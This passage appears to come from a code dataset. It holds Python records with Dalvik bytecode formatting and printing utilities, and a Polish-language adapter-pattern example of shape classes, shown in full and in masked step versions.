DVMBasicMethodBlock.get_name()\n cblock['start'] = DVMBasicMethodBlock.start\n cblock['notes'] = DVMBasicMethodBlock.get_notes()\n cblock['registers'] = mx.get_method().get_code().get_registers_size()\n cblock['instructions'] = []\n ins_idx = DVMBasicMethodBlock.start\n last_instru = None\n for DVMBasicMethodBlockInstruction in DVMBasicMethodBlock.get_instructions(\n ):\n c_ins = {}\n c_ins['idx'] = ins_idx\n c_ins['name'] = DVMBasicMethodBlockInstruction.get_name()\n c_ins['operands'] = DVMBasicMethodBlockInstruction.get_operands(\n ins_idx)\n 
c_ins['formatted_operands'\n ] = DVMBasicMethodBlockInstruction.get_formatted_operands()\n cblock['instructions'].append(c_ins)\n if DVMBasicMethodBlockInstruction.get_op_value(\n ) == 43 or DVMBasicMethodBlockInstruction.get_op_value() == 44:\n values = DVMBasicMethodBlock.get_special_ins(ins_idx)\n cblock['info_next'] = values.get_values()\n ins_idx += DVMBasicMethodBlockInstruction.get_length()\n last_instru = DVMBasicMethodBlockInstruction\n cblock['info_bb'] = 0\n if DVMBasicMethodBlock.childs:\n if len(DVMBasicMethodBlock.childs) > 1:\n cblock['info_bb'] = 1\n if last_instru.get_op_value() == 43 or last_instru.get_op_value(\n ) == 44:\n cblock['info_bb'] = 2\n cblock['Edge'] = []\n for DVMBasicMethodBlockChild in DVMBasicMethodBlock.childs:\n ok = False\n if DVMBasicMethodBlock.get_name() in hooks:\n if DVMBasicMethodBlockChild[-1] in hooks[DVMBasicMethodBlock\n .get_name()]:\n ok = True\n cblock['Edge'].append(hooks[DVMBasicMethodBlock.\n get_name()][0].get_name())\n if not ok:\n cblock['Edge'].append(DVMBasicMethodBlockChild[-1].get_name())\n exception_analysis = DVMBasicMethodBlock.get_exception_analysis()\n if exception_analysis:\n cblock['Exceptions'] = exception_analysis.get()\n reports.append(cblock)\n reports.extend(l)\n return json.dumps(d)\n\n\nclass SV(object):\n\n def __init__(self, size, buff):\n self.__size = size\n self.__value = unpack(self.__size, buff)[0]\n\n def _get(self):\n return pack(self.__size, self.__value)\n\n def __str__(self):\n return '0x%x' % self.__value\n\n def __int__(self):\n return self.__value\n\n def get_value_buff(self):\n return self._get()\n\n def get_value(self):\n return self.__value\n\n def set_value(self, attr):\n self.__value = attr\n\n\nclass SVs(object):\n\n def __init__(self, size, ntuple, buff):\n self.__size = size\n self.__value = ntuple._make(unpack(self.__size, buff))\n\n def _get(self):\n l = []\n for i in self.__value._fields:\n l.append(getattr(self.__value, i))\n return pack(self.__size, *l)\n\n def 
_export(self):\n return [x for x in self.__value._fields]\n\n def get_value_buff(self):\n return self._get()\n\n def get_value(self):\n return self.__value\n\n def set_value(self, attr):\n self.__value = self.__value._replace(**attr)\n\n def __str__(self):\n return self.__value.__str__()\n\n\ndef object_to_bytes(obj):\n \"\"\"\n Convert a object to a bytearray or call get_raw() of the object\n if no useful type was found.\n \"\"\"\n if isinstance(obj, str):\n return bytearray(obj, 'UTF-8')\n elif isinstance(obj, bool):\n return bytearray()\n elif isinstance(obj, int):\n return pack('<L', obj)\n elif obj == None:\n return bytearray()\n elif isinstance(obj, bytearray):\n return obj\n else:\n return obj.get_raw()\n\n\nclass MethodBC(object):\n\n def show(self, value):\n getattr(self, 'show_' + value)()\n\n\nclass BuffHandle(object):\n\n def __init__(self, buff):\n self.__buff = bytearray(buff)\n self.__idx = 0\n\n def size(self):\n return len(self.__buff)\n\n def set_idx(self, idx):\n self.__idx = idx\n\n def get_idx(self):\n return self.__idx\n\n def readNullString(self, size):\n data = self.read(size)\n return data\n\n def read_b(self, size):\n return self.__buff[self.__idx:self.__idx + size]\n\n def read_at(self, offset, size):\n return self.__buff[offset:offset + size]\n\n def read(self, size):\n if isinstance(size, SV):\n size = size.value\n buff = self.__buff[self.__idx:self.__idx + size]\n self.__idx += size\n return buff\n\n def end(self):\n return self.__idx == len(self.__buff)\n\n\nclass Buff(object):\n\n def __init__(self, offset, buff):\n self.offset = offset\n self.buff = buff\n self.size = len(buff)\n\n\nclass _Bytecode(object):\n\n def __init__(self, buff):\n self.__buff = bytearray(buff)\n self.__idx = 0\n\n def read(self, size):\n if isinstance(size, SV):\n size = size.value\n buff = self.__buff[self.__idx:self.__idx + size]\n self.__idx += size\n return buff\n\n def readat(self, off):\n if isinstance(off, SV):\n off = off.value\n return 
self.__buff[off:]\n\n def read_b(self, size):\n return self.__buff[self.__idx:self.__idx + size]\n\n def set_idx(self, idx):\n self.__idx = idx\n\n def get_idx(self):\n return self.__idx\n\n def add_idx(self, idx):\n self.__idx += idx\n\n def register(self, type_register, fct):\n self.__registers[type_register].append(fct)\n\n def get_buff(self):\n return self.__buff\n\n def length_buff(self):\n return len(self.__buff)\n\n def set_buff(self, buff):\n self.__buff = buff\n\n def save(self, filename):\n buff = self._save()\n with open(filename, 'wb') as fd:\n fd.write(buff)\n\n\ndef FormatClassToJava(input):\n \"\"\"\n Transoform a typical xml format class into java format\n\n :param input: the input class name\n :rtype: string\n \"\"\"\n return 'L' + input.replace('.', '/') + ';'\n\n\ndef FormatClassToPython(input):\n i = input[:-1]\n i = i.replace('/', '_')\n i = i.replace('$', '_')\n return i\n\n\ndef FormatNameToPython(input):\n i = input.replace('<', '')\n i = i.replace('>', '')\n i = i.replace('$', '_')\n return i\n\n\ndef FormatDescriptorToPython(input):\n i = input.replace('/', '_')\n i = i.replace(';', '')\n i = i.replace('[', '')\n i = i.replace('(', '')\n i = i.replace(')', '')\n i = i.replace(' ', '')\n i = i.replace('$', '')\n return i\n\n\nclass Node(object):\n\n def __init__(self, n, s):\n self.id = n\n self.title = s\n self.children = []\n",
"step-5": "from __future__ import print_function\nfrom __future__ import absolute_import\n\nfrom builtins import str\nfrom builtins import range\nfrom builtins import object\nimport hashlib\nfrom xml.sax.saxutils import escape\nfrom struct import unpack, pack\nimport textwrap\n\nimport json\nfrom .anconf import warning, error, CONF, enable_colors, remove_colors, save_colors, color_range\n\n\ndef disable_print_colors():\n colors = save_colors()\n remove_colors()\n return colors\n\n\ndef enable_print_colors(colors):\n enable_colors(colors)\n\n\n# Handle exit message\ndef Exit(msg):\n warning(\"Error : \" + msg)\n raise (\"oops\")\n\n\ndef Warning(msg):\n warning(msg)\n\n\ndef _PrintBanner():\n print_fct = CONF[\"PRINT_FCT\"]\n print_fct(\"*\" * 75 + \"\\n\")\n\n\ndef _PrintSubBanner(title=None):\n print_fct = CONF[\"PRINT_FCT\"]\n if title == None:\n print_fct(\"#\" * 20 + \"\\n\")\n else:\n print_fct(\"#\" * 10 + \" \" + title + \"\\n\")\n\n\ndef _PrintNote(note, tab=0):\n print_fct = CONF[\"PRINT_FCT\"]\n note_color = CONF[\"COLORS\"][\"NOTE\"]\n normal_color = CONF[\"COLORS\"][\"NORMAL\"]\n print_fct(\"\\t\" * tab + \"%s# %s%s\" % (note_color, note, normal_color) + \"\\n\")\n\n\n# Print arg into a correct format\ndef _Print(name, arg):\n buff = name + \" \"\n\n if type(arg).__name__ == 'int':\n buff += \"0x%x\" % arg\n elif type(arg).__name__ == 'long':\n buff += \"0x%x\" % arg\n elif type(arg).__name__ == 'str':\n buff += \"%s\" % arg\n elif isinstance(arg, SV):\n buff += \"0x%x\" % arg.get_value()\n elif isinstance(arg, SVs):\n buff += arg.get_value().__str__()\n\n print(buff)\n\n\ndef PrettyShowEx(exceptions):\n if len(exceptions) > 0:\n CONF[\"PRINT_FCT\"](\"Exceptions:\\n\")\n for i in exceptions:\n CONF[\"PRINT_FCT\"](\"\\t%s%s%s\\n\" %\n (CONF[\"COLORS\"][\"EXCEPTION\"], i.show_buff(),\n CONF[\"COLORS\"][\"NORMAL\"]))\n\n\ndef _PrintXRef(tag, items):\n print_fct = CONF[\"PRINT_FCT\"]\n for i in items:\n print_fct(\"%s: %s %s %s %s\\n\" %\n (tag, 
i[0].get_class_name(), i[0].get_name(),\n i[0].get_descriptor(), ' '.join(\"%x\" % j.get_idx()\n for j in i[1])))\n\n\ndef _PrintDRef(tag, items):\n print_fct = CONF[\"PRINT_FCT\"]\n for i in items:\n print_fct(\"%s: %s %s %s %s\\n\" %\n (tag, i[0].get_class_name(), i[0].get_name(),\n i[0].get_descriptor(), ' '.join(\"%x\" % j for j in i[1])))\n\n\ndef _PrintDefault(msg):\n print_fct = CONF[\"PRINT_FCT\"]\n print_fct(msg)\n\n\ndef PrettyShow(m_a, basic_blocks, notes={}):\n idx = 0\n nb = 0\n\n offset_color = CONF[\"COLORS\"][\"OFFSET\"]\n offset_addr_color = CONF[\"COLORS\"][\"OFFSET_ADDR\"]\n instruction_name_color = CONF[\"COLORS\"][\"INSTRUCTION_NAME\"]\n branch_false_color = CONF[\"COLORS\"][\"BRANCH_FALSE\"]\n branch_true_color = CONF[\"COLORS\"][\"BRANCH_TRUE\"]\n branch_color = CONF[\"COLORS\"][\"BRANCH\"]\n exception_color = CONF[\"COLORS\"][\"EXCEPTION\"]\n bb_color = CONF[\"COLORS\"][\"BB\"]\n normal_color = CONF[\"COLORS\"][\"NORMAL\"]\n print_fct = CONF[\"PRINT_FCT\"]\n\n colors = CONF[\"COLORS\"][\"OUTPUT\"]\n\n for i in basic_blocks:\n print_fct(\"%s%s%s : \\n\" % (bb_color, i.get_name(), normal_color))\n instructions = i.get_instructions()\n for ins in instructions:\n if nb in notes:\n for note in notes[nb]:\n _PrintNote(note, 1)\n\n print_fct(\"\\t%s%-3d%s(%s%08x%s) \" %\n (offset_color, nb, normal_color, offset_addr_color, idx,\n normal_color))\n print_fct(\"%s%-20s%s\" %\n (instruction_name_color, ins.get_name(), normal_color))\n\n operands = ins.get_operands()\n print_fct(\n \"%s\" %\n \", \".join(m_a.get_vm().colorize_operands(operands, colors)))\n\n op_value = ins.get_op_value()\n if ins == instructions[-1] and i.childs:\n print_fct(\" \")\n\n # packed/sparse-switch\n if (op_value == 0x2b or op_value == 0x2c) and len(i.childs) > 1:\n values = i.get_special_ins(idx).get_values()\n print_fct(\"%s[ D:%s%s \" %\n (branch_false_color, i.childs[0][2].get_name(),\n branch_color))\n print_fct(' '.join(\"%d:%s\" % (\n values[j], i.childs[j + 
1][2].get_name()) for j in\n range(0, len(i.childs) - 1)) + \" ]%s\" %\n normal_color)\n else:\n if len(i.childs) == 2:\n print_fct(\"%s[ %s%s \" % (branch_false_color,\n i.childs[0][2].get_name(),\n branch_true_color))\n print_fct(' '.join(\"%s\" % c[2].get_name(\n ) for c in i.childs[1:]) + \" ]%s\" % normal_color)\n else:\n print_fct(\"%s[ \" % branch_color + ' '.join(\n \"%s\" % c[2].get_name() for c in i.childs) + \" ]%s\" %\n normal_color)\n\n idx += ins.get_length()\n nb += 1\n\n print_fct(\"\\n\")\n\n if i.get_exception_analysis():\n print_fct(\"\\t%s%s%s\\n\" %\n (exception_color, i.exception_analysis.show_buff(),\n normal_color))\n\n print_fct(\"\\n\")\n\n\nclass TmpBlock(object):\n\n def __init__(self, name):\n self.name = name\n\n def get_name(self):\n return self.name\n\n\ndef method2json(mx, directed_graph=False):\n if directed_graph:\n return method2json_direct(mx)\n return method2json_undirect(mx)\n\n\ndef method2json_undirect(mx):\n d = {}\n reports = []\n d[\"reports\"] = reports\n\n for DVMBasicMethodBlock in mx.basic_blocks.gets():\n cblock = {}\n\n cblock[\"BasicBlockId\"] = DVMBasicMethodBlock.get_name()\n cblock[\"registers\"] = mx.get_method().get_code().get_registers_size()\n cblock[\"instructions\"] = []\n\n ins_idx = DVMBasicMethodBlock.start\n for DVMBasicMethodBlockInstruction in DVMBasicMethodBlock.get_instructions(\n ):\n c_ins = {}\n c_ins[\"idx\"] = ins_idx\n c_ins[\"name\"] = DVMBasicMethodBlockInstruction.get_name()\n c_ins[\"operands\"] = DVMBasicMethodBlockInstruction.get_operands(\n ins_idx)\n\n cblock[\"instructions\"].append(c_ins)\n ins_idx += DVMBasicMethodBlockInstruction.get_length()\n\n cblock[\"Edge\"] = []\n for DVMBasicMethodBlockChild in DVMBasicMethodBlock.childs:\n cblock[\"Edge\"].append(DVMBasicMethodBlockChild[-1].get_name())\n\n reports.append(cblock)\n\n return json.dumps(d)\n\n\ndef method2json_direct(mx):\n d = {}\n reports = []\n d[\"reports\"] = reports\n\n hooks = {}\n\n l = []\n for DVMBasicMethodBlock 
in mx.basic_blocks.gets():\n for index, DVMBasicMethodBlockChild in enumerate(\n DVMBasicMethodBlock.childs):\n if DVMBasicMethodBlock.get_name(\n ) == DVMBasicMethodBlockChild[-1].get_name():\n\n preblock = TmpBlock(DVMBasicMethodBlock.get_name() + \"-pre\")\n\n cnblock = {}\n cnblock[\"BasicBlockId\"] = DVMBasicMethodBlock.get_name(\n ) + \"-pre\"\n cnblock[\"start\"] = DVMBasicMethodBlock.start\n cnblock[\"notes\"] = []\n\n cnblock[\"Edge\"] = [DVMBasicMethodBlock.get_name()]\n cnblock[\"registers\"] = 0\n cnblock[\"instructions\"] = []\n cnblock[\"info_bb\"] = 0\n\n l.append(cnblock)\n\n for parent in DVMBasicMethodBlock.fathers:\n hooks[parent[-1].get_name()] = []\n hooks[parent[-1].get_name()].append(preblock)\n\n for idx, child in enumerate(parent[-1].childs):\n if child[-1].get_name() == DVMBasicMethodBlock.get_name(\n ):\n hooks[parent[-1].get_name()].append(child[-1])\n\n for DVMBasicMethodBlock in mx.basic_blocks.gets():\n cblock = {}\n\n cblock[\"BasicBlockId\"] = DVMBasicMethodBlock.get_name()\n cblock[\"start\"] = DVMBasicMethodBlock.start\n cblock[\"notes\"] = DVMBasicMethodBlock.get_notes()\n\n cblock[\"registers\"] = mx.get_method().get_code().get_registers_size()\n cblock[\"instructions\"] = []\n\n ins_idx = DVMBasicMethodBlock.start\n last_instru = None\n for DVMBasicMethodBlockInstruction in DVMBasicMethodBlock.get_instructions(\n ):\n c_ins = {}\n c_ins[\"idx\"] = ins_idx\n c_ins[\"name\"] = DVMBasicMethodBlockInstruction.get_name()\n c_ins[\"operands\"] = DVMBasicMethodBlockInstruction.get_operands(\n ins_idx)\n\n c_ins[\"formatted_operands\"\n ] = DVMBasicMethodBlockInstruction.get_formatted_operands()\n\n cblock[\"instructions\"].append(c_ins)\n\n if (DVMBasicMethodBlockInstruction.get_op_value() == 0x2b or\n DVMBasicMethodBlockInstruction.get_op_value() == 0x2c):\n values = DVMBasicMethodBlock.get_special_ins(ins_idx)\n cblock[\"info_next\"] = values.get_values()\n\n ins_idx += DVMBasicMethodBlockInstruction.get_length()\n last_instru = 
DVMBasicMethodBlockInstruction\n\n cblock[\"info_bb\"] = 0\n if DVMBasicMethodBlock.childs:\n if len(DVMBasicMethodBlock.childs) > 1:\n cblock[\"info_bb\"] = 1\n\n if (last_instru.get_op_value() == 0x2b or\n last_instru.get_op_value() == 0x2c):\n cblock[\"info_bb\"] = 2\n\n cblock[\"Edge\"] = []\n for DVMBasicMethodBlockChild in DVMBasicMethodBlock.childs:\n ok = False\n if DVMBasicMethodBlock.get_name() in hooks:\n if DVMBasicMethodBlockChild[-1] in hooks[\n DVMBasicMethodBlock.get_name()\n ]:\n ok = True\n cblock[\"Edge\"].append(hooks[DVMBasicMethodBlock.get_name(\n )][0].get_name())\n\n if not ok:\n cblock[\"Edge\"].append(DVMBasicMethodBlockChild[-1].get_name())\n\n exception_analysis = DVMBasicMethodBlock.get_exception_analysis()\n if exception_analysis:\n cblock[\"Exceptions\"] = exception_analysis.get()\n\n reports.append(cblock)\n\n reports.extend(l)\n\n return json.dumps(d)\n\n\nclass SV(object):\n\n def __init__(self, size, buff):\n self.__size = size\n self.__value = unpack(self.__size, buff)[0]\n\n def _get(self):\n return pack(self.__size, self.__value)\n\n def __str__(self):\n return \"0x%x\" % self.__value\n\n def __int__(self):\n return self.__value\n\n def get_value_buff(self):\n return self._get()\n\n def get_value(self):\n return self.__value\n\n def set_value(self, attr):\n self.__value = attr\n\n\nclass SVs(object):\n\n def __init__(self, size, ntuple, buff):\n self.__size = size\n\n self.__value = ntuple._make(unpack(self.__size, buff))\n\n def _get(self):\n l = []\n for i in self.__value._fields:\n l.append(getattr(self.__value, i))\n return pack(self.__size, *l)\n\n def _export(self):\n return [x for x in self.__value._fields]\n\n def get_value_buff(self):\n return self._get()\n\n def get_value(self):\n return self.__value\n\n def set_value(self, attr):\n self.__value = self.__value._replace(**attr)\n\n def __str__(self):\n return self.__value.__str__()\n\n\ndef object_to_bytes(obj):\n \"\"\"\n Convert a object to a bytearray or call 
get_raw() of the object\n if no useful type was found.\n \"\"\"\n if isinstance(obj, str):\n return bytearray(obj, \"UTF-8\")\n elif isinstance(obj, bool):\n return bytearray()\n elif isinstance(obj, int):\n return pack(\"<L\", obj)\n elif obj == None:\n return bytearray()\n elif isinstance(obj, bytearray):\n return obj\n else:\n #print type(obj), obj\n return obj.get_raw()\n\n\nclass MethodBC(object):\n\n def show(self, value):\n getattr(self, \"show_\" + value)()\n\n\nclass BuffHandle(object):\n\n def __init__(self, buff):\n self.__buff = bytearray(buff)\n self.__idx = 0\n\n def size(self):\n return len(self.__buff)\n\n def set_idx(self, idx):\n self.__idx = idx\n\n def get_idx(self):\n return self.__idx\n\n def readNullString(self, size):\n data = self.read(size)\n return data\n\n def read_b(self, size):\n return self.__buff[self.__idx:self.__idx + size]\n\n def read_at(self, offset, size):\n return self.__buff[offset:offset + size]\n\n def read(self, size):\n if isinstance(size, SV):\n size = size.value\n\n buff = self.__buff[self.__idx:self.__idx + size]\n self.__idx += size\n\n return buff\n\n def end(self):\n return self.__idx == len(self.__buff)\n\n\nclass Buff(object):\n\n def __init__(self, offset, buff):\n self.offset = offset\n self.buff = buff\n\n self.size = len(buff)\n\n\nclass _Bytecode(object):\n\n def __init__(self, buff):\n self.__buff = bytearray(buff)\n self.__idx = 0\n\n def read(self, size):\n if isinstance(size, SV):\n size = size.value\n\n buff = self.__buff[self.__idx:self.__idx + size]\n self.__idx += size\n\n return buff\n\n def readat(self, off):\n if isinstance(off, SV):\n off = off.value\n\n return self.__buff[off:]\n\n def read_b(self, size):\n return self.__buff[self.__idx:self.__idx + size]\n\n def set_idx(self, idx):\n self.__idx = idx\n\n def get_idx(self):\n return self.__idx\n\n def add_idx(self, idx):\n self.__idx += idx\n\n def register(self, type_register, fct):\n self.__registers[type_register].append(fct)\n\n def 
get_buff(self):\n return self.__buff\n\n def length_buff(self):\n return len(self.__buff)\n\n def set_buff(self, buff):\n self.__buff = buff\n\n def save(self, filename):\n buff = self._save()\n with open(filename, \"wb\") as fd:\n fd.write(buff)\n\n\ndef FormatClassToJava(input):\n \"\"\"\n Transoform a typical xml format class into java format\n\n :param input: the input class name\n :rtype: string\n \"\"\"\n return \"L\" + input.replace(\".\", \"/\") + \";\"\n\n\ndef FormatClassToPython(input):\n i = input[:-1]\n i = i.replace(\"/\", \"_\")\n i = i.replace(\"$\", \"_\")\n\n return i\n\n\ndef FormatNameToPython(input):\n i = input.replace(\"<\", \"\")\n i = i.replace(\">\", \"\")\n i = i.replace(\"$\", \"_\")\n\n return i\n\n\ndef FormatDescriptorToPython(input):\n i = input.replace(\"/\", \"_\")\n i = i.replace(\";\", \"\")\n i = i.replace(\"[\", \"\")\n i = i.replace(\"(\", \"\")\n i = i.replace(\")\", \"\")\n i = i.replace(\" \", \"\")\n i = i.replace(\"$\", \"\")\n\n return i\n\n\nclass Node(object):\n\n def __init__(self, n, s):\n self.id = n\n self.title = s\n self.children = []\n",
"step-ids": [
35,
62,
63,
65,
71
]
}
|
[
35,
62,
63,
65,
71
] |
class Figura:
    """Base shape class: every operation only reports that it was invoked."""

    def __init__(self):
        """Announce construction of a Figura instance."""
        print("Tworze obiekt klasy Figura...")

    def pobierz_polozenie(self):
        """Report a call to the position getter."""
        print("Metoda pobierz_polozenie klasy Figura.")

    def nadaj_polozenie(self):
        """Report a call to the position setter."""
        print("Metoda nadaj_polozenie klasy Figura.")

    def wyswietl(self):
        """Report a call to the display operation."""
        print("Metoda wyswietl klasy Figura.")

    def wypelnij(self):
        """Report a call to the fill operation."""
        print("Metoda wypelnij klasy Figura.")

    def nadaj_kolor(self):
        """Report a call to the colour setter."""
        print("Metoda nadaj_kolor klasy Figura.")

    def usun(self):
        """Report a call to the delete operation."""
        print("Metoda usun klasy Figura.")
class Punkt(Figura):
    """Point shape: overrides display, fill and delete with its own reports."""

    def __init__(self):
        """Announce construction of a Punkt instance."""
        print("Tworze obiekt klasy Punkt...")

    def wyswietl(self):
        """Report a call to the display operation."""
        print("Metoda wyswietl klasy Punkt.")

    def wypelnij(self):
        """Report a call to the fill operation."""
        print("Metoda wypelnij klasy Punkt.")

    def usun(self):
        """Report a call to the delete operation."""
        print("Metoda usun klasy Punkt.")
class Linia(Figura):
    """Line shape: overrides display, fill and delete with its own reports."""

    def __init__(self):
        """Announce construction of a Linia instance."""
        print("Tworze obiekt klasy Linia...")

    def wyswietl(self):
        """Report a call to the display operation."""
        print("Metoda wyswietl klasy Linia.")

    def wypelnij(self):
        """Report a call to the fill operation."""
        print("Metoda wypelnij klasy Linia.")

    def usun(self):
        """Report a call to the delete operation."""
        print("Metoda usun klasy Linia.")
class Kwadrat(Figura):
    """Square shape: overrides display, fill and delete with its own reports."""

    def __init__(self):
        """Announce construction of a Kwadrat instance."""
        print("Tworze obiekt klasy Kwadrat...")

    def wyswietl(self):
        """Report a call to the display operation."""
        print("Metoda wyswietl klasy Kwadrat.")

    def wypelnij(self):
        """Report a call to the fill operation."""
        print("Metoda wypelnij klasy Kwadrat.")

    def usun(self):
        """Report a call to the delete operation."""
        print("Metoda usun klasy Kwadrat.")
class XXOkrag:
    """Legacy circle implementation with a method naming scheme that does not
    match the Figura interface; adapted to it by the Okrag class."""

    def __init__(self):
        """Announce construction of an XXOkrag instance."""
        print("Tworze obiekt klasy XXOkrag...")

    def wyswietlaj(self):
        """Report a call to the (legacy-named) display operation."""
        print("Metoda wyswietlaj klasy XXOkrag.")

    def wypelniaj(self):
        """Report a call to the (legacy-named) fill operation."""
        print("Metoda wypelniaj klasy XXOkrag.")

    def usuwaj(self):
        """Report a call to the (legacy-named) delete operation."""
        print("Metoda usuwaj klasy XXOkrag.")

    def pobierz_polozenie(self):
        """Report a call to the position getter."""
        print("Metoda pobierz_polozenie klasy XXOkrag.")

    def nadaj_polozenie(self):
        """Report a call to the position setter."""
        print("Metoda nadaj_polozenie klasy XXOkrag.")

    def ustaw_kolor(self):
        """Report a call to the (legacy-named) colour setter."""
        print("Metoda ustaw_kolor klasy XXOkrag.")
class Okrag(Figura):
    """Object adapter: exposes the Figura interface on top of XXOkrag.

    Each Figura method delegates to the correspondingly-named (or renamed)
    method of the composed XXOkrag instance.
    """

    def __init__(self):
        # Compose the adaptee rather than inheriting from it.
        self.xokrag = XXOkrag()

    def pobierz_polozenie(self):
        self.xokrag.pobierz_polozenie()

    def nadaj_polozenie(self):
        self.xokrag.nadaj_polozenie()

    def wyswietl(self):
        # Figura.wyswietl -> XXOkrag.wyswietlaj
        self.xokrag.wyswietlaj()

    def wypelnij(self):
        # Figura.wypelnij -> XXOkrag.wypelniaj
        self.xokrag.wypelniaj()

    def nadaj_kolor(self):
        # Figura.nadaj_kolor -> XXOkrag.ustaw_kolor
        self.xokrag.ustaw_kolor()

    def usun(self):
        # Figura.usun -> XXOkrag.usuwaj
        self.xokrag.usuwaj()
if __name__ == "__main__":
    # Demo: build one shape of each kind, then display them polymorphically.
    # The tuple is fully constructed first, so the three construction
    # messages print before any display message (same order as before).
    for figura in (Linia(), Kwadrat(), Okrag()):
        figura.wyswietl()
|
normal
|
{
"blob_id": "774bf2b49f6e546f16294edc17e9ac34fa8a9ba8",
"index": 2711,
"step-1": "<mask token>\n\n\nclass Punkt(Figura):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass Linia(Figura):\n\n def __init__(self):\n print('Tworze obiekt klasy Linia...')\n\n def wyswietl(self):\n print('Metoda wyswietl klasy Linia.')\n\n def wypelnij(self):\n print('Metoda wypelnij klasy Linia.')\n\n def usun(self):\n print('Metoda usun klasy Linia.')\n\n\nclass Kwadrat(Figura):\n\n def __init__(self):\n print('Tworze obiekt klasy Kwadrat...')\n\n def wyswietl(self):\n print('Metoda wyswietl klasy Kwadrat.')\n\n def wypelnij(self):\n print('Metoda wypelnij klasy Kwadrat.')\n\n def usun(self):\n print('Metoda usun klasy Kwadrat.')\n\n\nclass XXOkrag:\n\n def __init__(self):\n print('Tworze obiekt klasy XXOkrag...')\n\n def wyswietlaj(self):\n print('Metoda wyswietlaj klasy XXOkrag.')\n\n def wypelniaj(self):\n print('Metoda wypelniaj klasy XXOkrag.')\n\n def usuwaj(self):\n print('Metoda usuwaj klasy XXOkrag.')\n\n def pobierz_polozenie(self):\n print('Metoda pobierz_polozenie klasy XXOkrag.')\n\n def nadaj_polozenie(self):\n print('Metoda nadaj_polozenie klasy XXOkrag.')\n\n def ustaw_kolor(self):\n print('Metoda ustaw_kolor klasy XXOkrag.')\n\n\nclass Okrag(Figura):\n\n def __init__(self):\n self.xokrag = XXOkrag()\n\n def pobierz_polozenie(self):\n self.xokrag.pobierz_polozenie()\n\n def nadaj_polozenie(self):\n self.xokrag.nadaj_polozenie()\n\n def wyswietl(self):\n self.xokrag.wyswietlaj()\n\n def wypelnij(self):\n self.xokrag.wypelniaj()\n\n def nadaj_kolor(self):\n self.xokrag.ustaw_kolor()\n\n def usun(self):\n self.xokrag.usuwaj()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Punkt(Figura):\n\n def __init__(self):\n print('Tworze obiekt klasy Punkt...')\n\n def wyswietl(self):\n print('Metoda wyswietl klasy Punkt.')\n <mask token>\n\n def usun(self):\n print('Metoda usun klasy Punkt.')\n\n\nclass Linia(Figura):\n\n def __init__(self):\n print('Tworze obiekt klasy Linia...')\n\n def wyswietl(self):\n print('Metoda wyswietl klasy Linia.')\n\n def wypelnij(self):\n print('Metoda wypelnij klasy Linia.')\n\n def usun(self):\n print('Metoda usun klasy Linia.')\n\n\nclass Kwadrat(Figura):\n\n def __init__(self):\n print('Tworze obiekt klasy Kwadrat...')\n\n def wyswietl(self):\n print('Metoda wyswietl klasy Kwadrat.')\n\n def wypelnij(self):\n print('Metoda wypelnij klasy Kwadrat.')\n\n def usun(self):\n print('Metoda usun klasy Kwadrat.')\n\n\nclass XXOkrag:\n\n def __init__(self):\n print('Tworze obiekt klasy XXOkrag...')\n\n def wyswietlaj(self):\n print('Metoda wyswietlaj klasy XXOkrag.')\n\n def wypelniaj(self):\n print('Metoda wypelniaj klasy XXOkrag.')\n\n def usuwaj(self):\n print('Metoda usuwaj klasy XXOkrag.')\n\n def pobierz_polozenie(self):\n print('Metoda pobierz_polozenie klasy XXOkrag.')\n\n def nadaj_polozenie(self):\n print('Metoda nadaj_polozenie klasy XXOkrag.')\n\n def ustaw_kolor(self):\n print('Metoda ustaw_kolor klasy XXOkrag.')\n\n\nclass Okrag(Figura):\n\n def __init__(self):\n self.xokrag = XXOkrag()\n\n def pobierz_polozenie(self):\n self.xokrag.pobierz_polozenie()\n\n def nadaj_polozenie(self):\n self.xokrag.nadaj_polozenie()\n\n def wyswietl(self):\n self.xokrag.wyswietlaj()\n\n def wypelnij(self):\n self.xokrag.wypelniaj()\n\n def nadaj_kolor(self):\n self.xokrag.ustaw_kolor()\n\n def usun(self):\n self.xokrag.usuwaj()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Punkt(Figura):\n\n def __init__(self):\n print('Tworze obiekt klasy Punkt...')\n\n def wyswietl(self):\n print('Metoda wyswietl klasy Punkt.')\n\n def wypelnij(self):\n print('Metoda wypelnij klasy Punkt.')\n\n def usun(self):\n print('Metoda usun klasy Punkt.')\n\n\nclass Linia(Figura):\n\n def __init__(self):\n print('Tworze obiekt klasy Linia...')\n\n def wyswietl(self):\n print('Metoda wyswietl klasy Linia.')\n\n def wypelnij(self):\n print('Metoda wypelnij klasy Linia.')\n\n def usun(self):\n print('Metoda usun klasy Linia.')\n\n\nclass Kwadrat(Figura):\n\n def __init__(self):\n print('Tworze obiekt klasy Kwadrat...')\n\n def wyswietl(self):\n print('Metoda wyswietl klasy Kwadrat.')\n\n def wypelnij(self):\n print('Metoda wypelnij klasy Kwadrat.')\n\n def usun(self):\n print('Metoda usun klasy Kwadrat.')\n\n\nclass XXOkrag:\n\n def __init__(self):\n print('Tworze obiekt klasy XXOkrag...')\n\n def wyswietlaj(self):\n print('Metoda wyswietlaj klasy XXOkrag.')\n\n def wypelniaj(self):\n print('Metoda wypelniaj klasy XXOkrag.')\n\n def usuwaj(self):\n print('Metoda usuwaj klasy XXOkrag.')\n\n def pobierz_polozenie(self):\n print('Metoda pobierz_polozenie klasy XXOkrag.')\n\n def nadaj_polozenie(self):\n print('Metoda nadaj_polozenie klasy XXOkrag.')\n\n def ustaw_kolor(self):\n print('Metoda ustaw_kolor klasy XXOkrag.')\n\n\nclass Okrag(Figura):\n\n def __init__(self):\n self.xokrag = XXOkrag()\n\n def pobierz_polozenie(self):\n self.xokrag.pobierz_polozenie()\n\n def nadaj_polozenie(self):\n self.xokrag.nadaj_polozenie()\n\n def wyswietl(self):\n self.xokrag.wyswietlaj()\n\n def wypelnij(self):\n self.xokrag.wypelniaj()\n\n def nadaj_kolor(self):\n self.xokrag.ustaw_kolor()\n\n def usun(self):\n self.xokrag.usuwaj()\n\n\n<mask token>\n",
